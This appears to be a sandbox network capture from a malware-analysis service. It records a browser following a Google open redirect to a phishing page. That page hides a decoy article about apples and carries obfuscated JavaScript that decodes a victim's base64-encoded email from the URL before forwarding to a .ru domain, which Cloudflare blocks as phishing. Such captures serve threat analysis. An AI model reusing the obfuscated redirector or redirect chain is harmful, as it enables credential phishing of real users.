                                                              • 3ydulqnlbft8ruhm0anse8sicehpnxyxlclupdvkh8h7lsonkse7m.ezmbsgzm.ru
                                                              • onedrive.live.com
                                                            • a.nel.cloudflare.com
                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.44974368.70.164.7806024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 14, 2024 10:10:09.206218004 CET501OUTGET /.r/7T2aAE-SUREDANNYWthbnNoYS5rYW5vZGlhQGx0aW1pbmR0cmVlLmNvbQ== HTTP/1.1
                                                            Host: primer-distrito-amvt.org
                                                            Connection: keep-alive
                                                            Upgrade-Insecure-Requests: 1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate
                                                            Accept-Language: en-US,en;q=0.9
                                                            Dec 14, 2024 10:10:10.985299110 CET1236INHTTP/1.1 200 OK
                                                            Date: Sat, 14 Dec 2024 09:10:10 GMT
                                                            Server: Apache
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Transfer-Encoding: chunked
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 34 30 30 30 0d 0a 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 41 70 70 6c 65 73 20 61 72 65 20 6f 6e 65 20 6f 66 20 74 68 65 20 6d 6f 73 74 20 70 6f 70 75 6c 61 72 20 66 72 75 69 74 73 20 69 6e 20 74 68 65 20 77 6f 72 6c 64 2c 20 61 6e 64 20 66 6f 72 20 67 6f 6f 64 20 72 65 61 73 6f 6e 2e 20 54 68 65 79 20 61 72 65 20 64 65 6c 69 63 69 6f 75 73 2c 20 6e 75 74 72 69 74 69 6f 75 73 2c 20 61 6e 64 20 76 65 72 73 61 74 69 6c 65 2e 20 54 68 69 73 20 61 72 74 69 63 6c 65 20 77 69 6c 6c 20 70 72 6f 76 69 64 65 20 79 6f 75 20 77 69 74 68 20 65 76 65 72 79 74 68 69 6e 67 20 79 6f 75 20 6e 65 65 64 20 74 6f 20 6b 6e 6f 77 20 61 62 6f 75 74 20 61 70 70 6c 65 73 2c 20 69 6e 63 6c 75 64 69 6e 67 20 74 68 65 69 72 20 68 69 73 74 6f 72 79 2c 20 74 79 70 65 73 2c 20 68 65 61 6c 74 68 20 62 65 6e 65 66 69 74 73 2c [TRUNCATED]
                                                            Data Ascii: 4000<!DOCTYPE html><html><head> <meta name="description" content="Apples are one of the most popular fruits in the world, and for good reason. They are delicious, nutritious, and versatile. This article will provide you with everything you need to know about apples, including their history, types, health benefits, and how to eat them." /></head><body> <div id="s63hd" style="display:none"> <h1>Apples: A Comprehensive Guide</h1> <p>Apples are one of the most popular fruits in the world, and for good reason. They are delicious, nutritious, and versatile. Apples can be eaten fresh, cooked, or baked, and they are used in a wide variety of dishes.</p> <section id="history"> <h2>History of apples</h2> <p>Apples have been cultivated for thousands of years. The earliest evidence of apple cultivation dates back to Central Asia, where apples were grown around 6500 BC. Apples were eventually introduced to Europe and North America, and they [TRUNCATED]
                                                            Dec 14, 2024 10:10:10.986869097 CET1236INData Raw: 72 74 20 6f 66 20 74 68 65 20 64 69 65 74 20 69 6e 20 6d 61 6e 79 20 63 75 6c 74 75 72 65 73 20 61 72 6f 75 6e 64 20 74 68 65 20 77 6f 72 6c 64 2e 3c 2f 70 3e 0d 0a 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 0d 0a 20 20 20 20 3c 73 65 63 74
                                                            Data Ascii: rt of the diet in many cultures around the world.</p> </section> <section id="types"> <h2>Types of apples</h2> <p>There are thousands of different types of apples grown around the world. Some of the most popular
                                                            Dec 14, 2024 10:10:10.986907959 CET1236INData Raw: 65 73 3c 2f 68 32 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 70 3e 48 65 72 65 20 61 72 65 20 61 20 66 65 77 20 72 65 63 69 70 65 73 20 74 68 61 74 20 66 65 61 74 75 72 65 20 61 70 70 6c 65 73 3a 3c 2f 70 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c
                                                            Data Ascii: es</h2> <p>Here are a few recipes that feature apples:</p> <ul> <li>Apple pie</li> <li>Apple crisp</li> <li>Apple muffins</li> <li>Apple chutney</li> <li>Ap
                                                            Dec 14, 2024 10:10:10.993910074 CET1236INData Raw: 30 78 31 65 32 65 38 37 28 30 78 32 32 39 2c 30 78 33 32 32 2c 30 78 31 65 63 2c 30 78 32 62 35 29 29 2f 28 30 78 33 37 2a 2d 30 78 35 33 2b 2d 30 78 37 35 37 2a 30 78 35 2b 2d 30 78 31 38 66 2a 2d 30 78 32 33 29 2a 28 2d 70 61 72 73 65 49 6e 74
                                                            Data Ascii: 0x1e2e87(0x229,0x322,0x1ec,0x2b5))/(0x37*-0x53+-0x757*0x5+-0x18f*-0x23)*(-parseInt(_0x1e2e87(0x208,0x283,0x30f,0x27d))/(-0x18b1*0x1+0xd09+-0x256*-0x5))+parseInt(_0x47ada0(0x2b7,0x301,0x24b,0x2e2))/(-0x2f1*0xa+-0xa*-0xef+-0x1*-0x141b)*(parseInt
                                                            Dec 14, 2024 10:10:10.993947029 CET896INData Raw: 30 39 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 35 65 36 39 30 38 28 5f 30 78 32 32 39 33 35 63 2c 5f 30 78 33 31 34 65 35 64 2c 5f 30 78 33 38 33 61 31 39 2c 5f 30 78 35 38 36 63 36 39 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 64 61 63 28 5f 30 78 33
                                                            Data Ascii: 09;function _0x5e6908(_0x22935c,_0x314e5d,_0x383a19,_0x586c69){return _0x1dac(_0x383a19-0x114,_0x586c69);}const _0x55c7f9='=';let _0x19ed3f=-0x554+0x175*-0x2+0x83e*0x1,_0x943ca3=_0x577b09[_0x5e6908(0x290,0x383,0x367,0x35d)](_0x55c7f9);while(_0
                                                            Dec 14, 2024 10:10:11.000025034 CET1236INData Raw: 32 61 34 2c 30 78 33 33 36 2c 30 78 32 61 35 29 5d 2b 5f 30 78 66 32 38 66 39 39 5b 5f 30 78 35 65 36 39 30 38 28 30 78 32 35 34 2c 30 78 32 65 32 2c 30 78 32 31 33 2c 30 78 32 35 63 29 5d 28 5f 30 78 31 32 65 63 32 36 2c 5f 30 78 66 32 38 66 39
                                                            Data Ascii: 2a4,0x336,0x2a5)]+_0xf28f99[_0x5e6908(0x254,0x2e2,0x213,0x25c)](_0x12ec26,_0xf28f99[_0x5e6908(0x21f,0x208,0x240,0x1ae)](_0x1ec989,_0xf28f99[_0x4536d0(0xc9,-0xb6,0x26,0x1c)](_0xc01348,_0x30878a)))):_0x47556b=_0x577b09[_0x4536d0(0x1bb,0x22e,0x14
                                                            Dec 14, 2024 10:10:11.000057936 CET1236INData Raw: 32 62 63 33 30 32 5b 5f 30 78 32 62 61 64 36 64 28 30 78 38 39 2c 30 78 38 38 2c 30 78 37 32 2c 30 78 31 35 65 29 5d 28 5f 30 78 32 62 63 33 30 32 5b 5f 30 78 32 62 61 64 36 64 28 30 78 31 32 32 2c 30 78 62 31 2c 30 78 61 64 2c 30 78 31 37 65 29
                                                            Data Ascii: 2bc302[_0x2bad6d(0x89,0x88,0x72,0x15e)](_0x2bc302[_0x2bad6d(0x122,0xb1,0xad,0x17e)],_0x2bc302[_0x2bad6d(0x76,0x61,-0x40,0x96)])){var _0x2256ca=_0x1d2c03['location']['href'][_0x1113d5(0x52,0x119,-0x57,-0x1c)]('E-SURE')[-0x458*-0x7+-0x1f80+0x119
                                                            Dec 14, 2024 10:10:11.008012056 CET1236INData Raw: 36 31 31 30 2b 2b 29 7b 74 72 79 7b 5f 30 78 32 32 39 33 33 64 2b 3d 27 3d 27 2c 5f 30 78 31 32 39 63 31 32 3d 5f 30 78 32 32 39 33 33 64 2c 61 74 6f 62 28 5f 30 78 32 32 39 33 33 64 29 3b 62 72 65 61 6b 3b 7d 63 61 74 63 68 28 5f 30 78 35 33 32
                                                            Data Ascii: 6110++){try{_0x22933d+='=',_0x129c12=_0x22933d,atob(_0x22933d);break;}catch(_0x5320b5){}}if(!_0x129c12)try{_0x129c12=_0xa3f9d0['Qaoyb'](atob,_0x22933d);}catch(_0x4f7ecd){if(_0xa3f9d0[_0x2535d9(0x4e0,0x4e4,0x49b,0x4e2)](_0xa3f9d0['rDOCp'],_0xa3
                                                            Dec 14, 2024 10:10:11.008095026 CET1236INData Raw: 62 36 37 37 36 63 5b 27 58 77 51 58 42 27 5d 29 29 72 65 74 75 72 6e 20 5f 30 78 62 36 37 37 36 63 5b 27 58 6f 56 77 4c 27 5d 28 61 74 6f 62 2c 5f 30 78 31 63 36 32 65 33 29 2c 21 21 5b 5d 3b 65 6c 73 65 20 5f 30 78 31 30 30 63 34 61 3d 5f 30 78
                                                            Data Ascii: b6776c['XwQXB']))return _0xb6776c['XoVwL'](atob,_0x1c62e3),!![];else _0x100c4a=_0x2e268e[_0x3ed865(0x397,0x4bc,0x36f,0x417)](_0xb6776c[_0x1214b9(0x53d,0x4fc,0x4f2,0x49f)](_0xbfb0f[_0x1214b9(0x50b,0x4aa,0x569,0x4b4)](_0x1214b9(0x571,0x512,0x563
                                                            Dec 14, 2024 10:10:11.015645027 CET1236INData Raw: 6f 6e 28 5f 30 78 33 63 35 63 61 66 2c 5f 30 78 34 33 63 35 34 35 29 7b 72 65 74 75 72 6e 20 5f 30 78 33 63 35 63 61 66 3d 3d 3d 5f 30 78 34 33 63 35 34 35 3b 7d 2c 27 6b 7a 51 70 55 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 62 63 65 64 66 2c
                                                            Data Ascii: on(_0x3c5caf,_0x43c545){return _0x3c5caf===_0x43c545;},'kzQpU':function(_0x2bcedf,_0x52ad16){return _0x2bcedf+_0x52ad16;},'klsuc':_0xf25855(-0x41,0x62,0x25,-0x94),'voAEj':function(_0xd723ce,_0xc1f44e){return _0xd723ce+_0xc1f44e;}};let _0x352bc
                                                            Dec 14, 2024 10:10:11.106868982 CET1236INData Raw: 62 29 5d 28 5f 30 78 34 37 30 66 35 62 5b 5f 30 78 34 62 64 66 39 63 28 30 78 64 63 2c 30 78 63 33 2c 30 78 62 31 2c 30 78 37 32 29 5d 2c 5f 30 78 34 37 30 66 35 62 5b 5f 30 78 34 62 64 66 39 63 28 30 78 38 31 2c 30 78 36 39 2c 30 78 33 31 2c 2d
                                                            Data Ascii: b)](_0x470f5b[_0x4bdf9c(0xdc,0xc3,0xb1,0x72)],_0x470f5b[_0x4bdf9c(0x81,0x69,0x31,-0x6)](_0x362956,_0x470f5b['PxRKW'](_0x67c4e2,_0x2c32d8(_0xc4d50c)))));else _0x470f5b[_0x4bdf9c(0x81,0x7f,-0x55,0x18)](isBase64,_0x50a2de+'==')===!![]&&(_0x352bce


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.44974468.70.164.7806024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 14, 2024 10:10:54.271905899 CET6OUTData Raw: 00
                                                            Data Ascii:


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.449740142.250.181.994436024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-14 09:10:06 UTC984OUTGET /url?Obdy=ObM8wNGVUva21gnTm3qS&cgsr=7knoOQwChvIkzgfn0TSm&sa=t&wofc=nQYL5DF797O1da77PTBQ&url=amp%2Fprimer-distrito-amvt.org%2F.r%2F7T2aAE-SUREDANNYWthbnNoYS5rYW5vZGlhQGx0aW1pbmR0cmVlLmNvbQ== HTTP/1.1
                                                            Host: www.google.co.ao
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            sec-ch-ua-platform: "Windows"
                                                            Upgrade-Insecure-Requests: 1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: navigate
                                                            Sec-Fetch-User: ?1
                                                            Sec-Fetch-Dest: document
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-12-14 09:10:07 UTC1077INHTTP/1.1 302 Found
                                                            Location: https://www.google.co.ao/amp/primer-distrito-amvt.org/.r/7T2aAE-SUREDANNYWthbnNoYS5rYW5vZGlhQGx0aW1pbmR0cmVlLmNvbQ==
                                                            Cache-Control: private
                                                            Content-Type: text/html; charset=UTF-8
                                                            Strict-Transport-Security: max-age=31536000
                                                            Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-0CQwb_r4--zSkTbv8iIa4g' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                            Permissions-Policy: unload=()
                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                            Date: Sat, 14 Dec 2024 09:10:07 GMT
                                                            Server: gws
                                                            Content-Length: 313
                                                            X-XSS-Protection: 0
                                                            Set-Cookie: NID=520=YPTv00oaEXJ-8pjl7-taO5riXVgPDxLiRcxboeE70imylGMRLzFxif5b-4t_pEBmtCGdKz3iUSMarXkMFQ3Ibr7warnVyrJJqONE1AyWNG0xaUi1ZmQQLRrFPjrwgiK4SMokmN7BUiLSrLX9qUoOBYSSBABIIKtHwBuo8SFXDgFgfnl3B-EaVcIdch9htRt6Rzsr; expires=Sun, 15-Jun-2025 09:10:07 GMT; path=/; domain=.google.co.ao; Secure; HttpOnly; SameSite=none
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Connection: close
                                                            2024-12-14 09:10:07 UTC313INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 2e 61 6f 2f 61 6d 70 2f 70 72 69 6d 65 72 2d 64 69 73 74 72 69 74 6f 2d 61 6d 76 74 2e 6f 72 67 2f 2e 72 2f 37 54 32 61 41 45 2d 53 55 52 45 44 41 4e 4e 59 57 74 68 62 6e 4e 6f 59 53 35 72 59 57 35
                                                            Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.co.ao/amp/primer-distrito-amvt.org/.r/7T2aAE-SUREDANNYWthbnNoYS5rYW5


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.449741142.250.181.994436024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-14 09:10:07 UTC1101OUTGET /amp/primer-distrito-amvt.org/.r/7T2aAE-SUREDANNYWthbnNoYS5rYW5vZGlhQGx0aW1pbmR0cmVlLmNvbQ== HTTP/1.1
                                                            Host: www.google.co.ao
                                                            Connection: keep-alive
                                                            Upgrade-Insecure-Requests: 1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: navigate
                                                            Sec-Fetch-User: ?1
                                                            Sec-Fetch-Dest: document
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: NID=520=YPTv00oaEXJ-8pjl7-taO5riXVgPDxLiRcxboeE70imylGMRLzFxif5b-4t_pEBmtCGdKz3iUSMarXkMFQ3Ibr7warnVyrJJqONE1AyWNG0xaUi1ZmQQLRrFPjrwgiK4SMokmN7BUiLSrLX9qUoOBYSSBABIIKtHwBuo8SFXDgFgfnl3B-EaVcIdch9htRt6Rzsr
                                                            2024-12-14 09:10:08 UTC863INHTTP/1.1 302 Found
                                                            Location: http://primer-distrito-amvt.org/.r/7T2aAE-SUREDANNYWthbnNoYS5rYW5vZGlhQGx0aW1pbmR0cmVlLmNvbQ==
                                                            Cache-Control: private
                                                            X-Robots-Tag: noindex
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-iOd8Me3lF1BKDSvxa7grcA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                            Permissions-Policy: unload=()
                                                            Date: Sat, 14 Dec 2024 09:10:07 GMT
                                                            Server: gws
                                                            Content-Length: 291
                                                            X-XSS-Protection: 0
                                                            X-Frame-Options: SAMEORIGIN
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Connection: close
                                                            2024-12-14 09:10:08 UTC291INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 70 72 69 6d 65 72 2d 64 69 73 74 72 69 74 6f 2d 61 6d 76 74 2e 6f 72 67 2f 2e 72 2f 37 54 32 61 41 45 2d 53 55 52 45 44 41 4e 4e 59 57 74 68 62 6e 4e 6f 59 53 35 72 59 57 35 76 5a 47 6c 68 51 47 78 30 61 57 31 70 62 6d 52 30 63 6d 56 6c 4c
                                                            Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="http://primer-distrito-amvt.org/.r/7T2aAE-SUREDANNYWthbnNoYS5rYW5vZGlhQGx0aW1pbmR0cmVlL


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.449748104.21.67.404436024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-14 09:10:14 UTC698OUTGET /pD0JM2s/ HTTP/1.1
                                                            Host: galaxy.zofilane.ru
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            sec-ch-ua-platform: "Windows"
                                                            Upgrade-Insecure-Requests: 1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Sec-Fetch-Site: cross-site
                                                            Sec-Fetch-Mode: navigate
                                                            Sec-Fetch-Dest: document
                                                            Referer: http://primer-distrito-amvt.org/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-12-14 09:10:14 UTC554INHTTP/1.1 403 Forbidden
                                                            Date: Sat, 14 Dec 2024 09:10:14 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            X-Frame-Options: SAMEORIGIN
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cmBzekPnCyBWZa979Kbu9QCXPGZAUnsyN0kQ1aMnxLccewhNuPrA7eCxLojGUCo6AjY1MbQm2BWXNiP2gLFv6hlEn2EPTDaR7uboSSpTf7RLZEbrjYgRQCbgqtGkT4%2B6hkLvFDU%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f1d0f458d1a42de-EWR
                                                            2024-12-14 09:10:14 UTC815INData Raw: 31 31 63 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                            Data Ascii: 11c9<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                            2024-12-14 09:10:14 UTC1369INData Raw: 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63
                                                            Data Ascii: es/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('c
                                                            2024-12-14 09:10:14 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22
                                                            Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="
                                                            2024-12-14 09:10:14 UTC1008INData Raw: 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66
                                                            Data Ascii: ss="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Perf
                                                            2024-12-14 09:10:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.449749104.21.67.404436024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-14 09:10:14 UTC571OUTGET /cdn-cgi/styles/cf.errors.css HTTP/1.1
                                                            Host: galaxy.zofilane.ru
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
